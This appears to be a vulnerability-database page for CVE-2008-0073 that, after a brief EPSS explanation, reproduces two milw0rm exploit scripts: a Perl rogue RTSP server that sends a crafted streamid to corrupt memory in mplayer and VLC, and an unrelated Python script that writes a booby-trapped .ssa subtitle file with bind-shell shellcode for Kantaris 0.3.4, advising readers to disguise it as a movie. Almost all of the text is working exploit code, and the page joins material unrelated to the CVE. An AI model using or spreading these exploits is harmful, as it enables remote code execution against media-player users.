CVE-2008-0073 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

#!/usr/bin/perl # Huston, mplayer got some vulns! :( # CVE-2008-0073 also apply to mplayer and vlc with some distinctions. # # Assuming kernel.va_randomize=0 this overwrite EIP with a "stream" structure on my box. # # The first element of the "stream" structure is a user-supplied buffer so it is not really useful to overwrite # EIP, let's find the right target: we can overwrite every memory location beyond the desc->stream pointer and # some before it. # # Vulnerable code: # sdpplin_parse_stream() # desc->stream_id=atoi(buf); # spplin_parse() # desc->stream[stream->stream_id]=stream; # # Test: # - mplayer rtsp://evilhost/evil.rm # eax 0xa0737008 // pointer to desc->stream # edx 0x0495badd // "streamid" value # edi 0x089b59e8 // pointer to stream # # <sdpplin_parse+731>: mov DWORD PTR [eax+edx*4],edi use warnings; use strict; use IO::Socket; my $evil_num = "127467297"; # this is a 4byte offset from desc->stream my $rtp_hello = "RTSP/1.0 200 OK\r\n". "CSeq: 1\r\n". "Date: Thu, 20 Mar 2008 20:07:39 GMT\r\n". "Server: RealServer Version 9.0.2.794 (sunos-5.8-sparc-server)\r\n". "Public: OPTIONS, DESCRIBE, ANNOUNCE, PLAY, SETUP, GET_PARAMETER, SET_PARAMETER, TEARDOWN\r\n". "RealChallenge1: de6654ba4935b8b9d8af3ba8d6f8e71c\r\n". "StatsMask: 3\r\n\r\n"; my $rtp_evil = "RTSP/1.0 200 OK\r\n". "CSeq: 2\r\n". "Date: Thu, 20 Mar 2008 20:08:34 GMT\r\n". "vsrc: http://0.00.00.00:31337\r\n". "Content-base: rtsp://0.00.00.00:554/bu.rm\r\n". "ETag: 55370-2\r\n". "Session: 93033-2\r\n". "Content-type: application/sdp\r\n". "Content-length: 677\r\n\r\n". "v=0\r\n". "o=-1028652722 1028652722 IN IP4 0.00.00.00\r\n". "s=realmp3\r\n". "i=<No author> <No copyright>\r\n". "c=IN IP4 0.0.0.0\r\n". "t=0 0\r\n". "a=SdpplinVersion:1610645242\r\n". "a=StreamCount:integer;\"1166000000\"\r\n". "a=Title:buffer;\"dtFabH2rNoP=\"\r\n". "a=range:npt=0-39.471000\r\n". "m=audio 0 RTP/AVP 101\r\n". # this is referenced by "stream" "b=AS:128\r\n". "a=control:streamid=$evil_num\r\n". "a=range:npt=0-39.471000\r\n". "a=length:npt=39.471000\r\n". "a=rtpmap:101 X-MP3-draft-00/1000\r\n". "a=mimetype:string;\"audio/X-MP3-draft-00\"\r\n". "a=StartTime:integer;0\r\n". "a=AvgBitRate:integer;128000\r\n". "a=SampleRate:integer;44100\r\n". "a=AvgPacketSize:integer;417\r\n". "a=Preroll:integer;1000\r\n". "a=NumChannels:integer;2\r\n". "a=MaxPacketSize:integer;1024\r\n". "a=ASMRuleBook:string;\"AverageBandwidth=128000, AverageBandwidthStd=0, Priority=9;\"\r\n"; my @resps = ( $rtp_hello, $rtp_evil, "RTSP/1.0 200 OK\r\n". "CSeq: 3\r\n". "Date: Sat, 22 Mar 2008 20:45:47 GMT\r\n". "Session: 93033-2\n\r". "Reconnect: true\n\r". "RealChallenge3: 2520b5cd0e5e5622ec25f563312aba3e4f213d09,sdr=2b05ef3b\n\r". "RDTFeatureLevel: 2\r\n". "Transport: x-pn-tng/tcp;interleaved=0\r\n\r\n", "RTSP/1.0 200 OK\r\n". "CSeq: 4\r\n". "Date: Sat, 22 Mar 2008 15:11:06 GMT\r\n". "Session: 93033-2\r\n\r\n", "RTSP/1.0 200 OK\r\n". "CSeq: 5\r\n". "Date: Sat, 22 Mar 2008 15:11:06 GMT". "RTP-Info: url=rtsp://0.00.00.00/bu.rm\r\n\r\n", ); my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '554', Listen => 1, Reuse => 1); while(my $csock = $sock->accept) { foreach my $resp(@resps) { my $buf = read_from_sock($csock); print $csock $resp; } } sub read_from_sock() { my ($sock) = @_; my $buffer = ""; while(<$sock>) { return $buffer if /^\r\n$/; $buffer .= $_; } return $buffer; } # milw0rm.com [2008-03-25]

#!/usr/bin/python # # Kantaris 0.3.4 Media Player Local Buffer Overflow [0day!] # # The following exploit will make a film.ssa file, # just rename the file with the name of your movie, and use your imagination # to pwn! :) # Shellcode is local bind shell, just telnet to port:4444 to get command prompt :) # # BIG thanks to muts <muts[at]offensive-security[dot]com> for helping # and discovering a very interesting thing that we will publish soon # # I piss on your Business Networks course Igor Radusinovic! Go to hell! # # Vulnerability discovered by Muris Kurgas a.k.a. j0rgan # jorganwd [at] gmail [dot] com # http://www.jorgan.users.cg.yu import os jmp = '\xCC\x59\xFB\x77' # Windows XP sp1 JMP ESP, u can change it... # win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum sc=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48" "\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x43\x4b\x48\x4e\x37" "\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x38" "\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x48" "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" "\x46\x4f\x4b\x33\x46\x55\x46\x52\x4a\x32\x45\x57\x45\x4e\x4b\x48" "\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44" "\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x48" "\x49\x38\x4e\x36\x46\x42\x4e\x51\x41\x46\x43\x4c\x41\x33\x4b\x4d" "\x46\x56\x4b\x58\x43\x54\x42\x33\x4b\x48\x42\x34\x4e\x50\x4b\x38" "\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x50\x50\x35\x4a\x36" "\x50\x48\x50\x54\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56" "\x43\x35\x48\x56\x4a\x56\x43\x53\x44\x53\x4a\x36\x47\x37\x43\x57" "\x44\x33\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" "\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e" "\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x50" "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55" "\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34" "\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x51" "\x4e\x55\x48\x46\x43\x45\x49\x58\x41\x4e\x45\x49\x4a\x56\x46\x4a" "\x4c\x51\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x31" "\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x52" "\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d" "\x4a\x36\x45\x4e\x49\x34\x48\x38\x49\x54\x47\x45\x4f\x4f\x48\x4d" "\x42\x45\x46\x55\x46\x35\x45\x55\x4f\x4f\x42\x4d\x43\x59\x4a\x46" "\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x35\x4f\x4f\x48\x4d\x45\x45" "\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x56\x48\x46\x4a\x36\x43\x36" "\x4d\x56\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x42\x4e\x4c" "\x49\x58\x47\x4e\x4c\x36\x46\x54\x49\x58\x44\x4e\x41\x43\x42\x4c" "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x42" "\x43\x49\x4d\x48\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" "\x44\x57\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x54\x4f\x4f" "\x48\x4d\x4b\x55\x47\x55\x44\x45\x41\x55\x41\x55\x41\x35\x4c\x46" "\x41\x30\x41\x35\x41\x55\x45\x55\x41\x35\x4f\x4f\x42\x4d\x4a\x46" "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36" "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f" "\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d" "\x4a\x36\x42\x4f\x4c\x38\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d" "\x4f\x4f\x42\x4d\x5a") bafer = '\x41' * 163868 + jmp + "\x90" * 32 + sc fileHandle = open ( 'film.ssa', 'w' ) fileHandle.write ( '[Script Info]\n') fileHandle.write ( 'ScriptType: v4.00\n') fileHandle.write ( 'Title: Kantaris 0.3.4 buffer-overflow\n') fileHandle.write ( 'Collisions: Normal\n\n') fileHandle.write ( '[V4 Styles]\n\n') fileHandle.write ( '[Events]\n') fileHandle.write ( 'Dialogue: '+ bafer) fileHandle.close() # milw0rm.com [2008-04-25]